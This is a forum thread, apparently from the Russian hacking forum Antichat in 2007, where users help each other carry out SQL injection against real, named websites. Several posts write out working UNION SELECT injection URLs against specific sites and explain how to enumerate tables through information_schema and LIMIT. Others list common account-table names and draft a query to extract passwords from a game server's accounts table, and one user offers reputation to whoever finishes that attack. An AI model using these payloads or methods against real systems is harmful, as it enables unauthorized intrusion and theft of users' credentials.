Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

18.09.2007, 14:05
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме: 120760
Репутация:
62
|
|
of69, нужно в запросе указать бд:
Код:
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+gallery2.g2_User/*
|
|
|

18.09.2007, 19:17
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме: 1813343
Репутация:
141
|
|
2 of69
Код:
Ктонибудь, подскажите плиз в чём проблема, и как её решить?)
Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User...
Если не прокатывает, то смотришь в какой базе эта таблица лежит.
...select+table_schema+from+information_schema.col umns+where+table_name=g2_User...
Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос.
2 Calcutta
может кто помочь с подбором?
Никакого посимвольного подбора. Юзай limit. ^^
Код:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+0,1/*
Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.
Последний раз редактировалось delay(0); 18.09.2007 в 19:33..
|
|
|

19.09.2007, 10:27
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Лол, под пароли не создается спец. таблица
Ищи на форуме списки распространенных названий пользовательских таблиц.
account
accounts
game_accounts
sup_auth
la2_auth
и т.д.
|
|
|

19.09.2007, 11:01
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме: 2584838
Репутация:
770
|
|
распространенные пробовал уже, практически все те что есть на форуме.
значит у меня должен будет быть запрос примерно такой:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*
|
|
|

19.09.2007, 11:16
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме: 303789
Репутация:
16
|
|
DB function failed with error number 1146
Table 'db0742011.jos_session' doesn't exist SQL=SELECT session_id FROM jos_session WHERE session_id = '038f08755e3d58568bf9b979e1d09571'
SQL =
SELECT session_id
FROM jos_session
WHERE session_id = '038f08755e3d58568bf9b979e1d09571'
Подскажите что это?
|
|
|

19.09.2007, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".
|
|
|

19.09.2007, 11:24
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме: 303789
Репутация:
16
|
|
а как это можно исправить и как хакер может этим воспользоваться?
|
|
|

19.09.2007, 11:29
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме: 2584838
Репутация:
770
|
|
ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь.
//обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -))
//может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь 
|
|
|

19.09.2007, 11:46
|
|
Banned
Регистрация: 24.08.2007
Сообщений: 50
Провел на форуме: 303789
Репутация:
16
|
|
http://www.battle.rapx.net.ru/index.php
|
|
|

19.09.2007, 11:50
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме: 2238549
Репутация:
1318
|
|
1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|